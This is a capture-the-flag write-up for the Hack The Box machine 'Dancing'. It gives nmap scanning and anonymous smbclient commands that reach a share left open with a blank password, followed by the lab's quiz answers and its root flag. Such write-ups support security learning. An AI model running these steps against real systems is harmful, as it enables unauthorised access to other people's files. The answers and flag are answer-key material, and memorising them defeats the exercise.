Dancing - Hack The Box

March 09, 2025  

Introduction

In this machine we are taking advantage of resource sharing misconfiguration in SMB service.

Reconnaissance

• Connectivity

ping -c1 10.129.77.89

• Nmap

nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.129.77.89

• See available sources with smbclient

smbclient -L 10.129.77.89 -N

Exploitation

smbclient //10.129.77.89/WorkShares -N

Task

1. What does the 3-letter acronym SMB stand for?

   server message block

2. What port does SMB use to operate at?

   445

3. What is the service name for port 445 that came up in our Nmap scan?

   microsoft-ds

4. What is the ‘flag’ or ‘switch’ that we can use with the smbclient utility to ‘list’ the available shares on Dancing?

   -L

5. How many shares are there on Dancing?

   4

6. What is the name of the share we are able to access in the end with a blank password?

   WorkShares

7. What is the command we can use within the SMB shell to download the files we find?

   get

8. Submit root flag

   5f61c10dffbc77a704d76016a22f1664